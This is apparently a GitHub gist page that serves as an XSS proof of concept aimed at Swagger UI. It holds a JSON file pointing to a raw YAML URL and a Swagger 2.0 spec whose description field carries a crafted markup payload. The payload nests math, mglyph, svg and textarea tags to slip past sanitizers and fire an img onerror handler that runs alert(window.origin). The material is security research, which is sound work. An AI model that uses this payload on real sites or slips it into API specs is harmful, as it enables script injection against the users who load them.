Last active
September 29, 2022 13:10
-
-
Save touhidshaikh/35e1107deb0b06b675f2cee41fe464e2 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"url":"https://gist.githubusercontent.com/touhidshaikh/35e1107deb0b06b675f2cee41fe464e2/raw/6e23d218e379b9cc82f8678499f6c6b6b7ca2104/swg.yaml" | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
swagger: '2.0' | |
info: | |
title: Example yaml.spec for test | |
description: | | |
<math><mtext><option><agent22><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>"> | |
paths: | |
/accounts: | |
get: | |
responses: | |
'200': | |
description: No response was specified | |
tags: | |
- accounts | |
operationId: findAccounts | |
summary: Finds all accounts |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment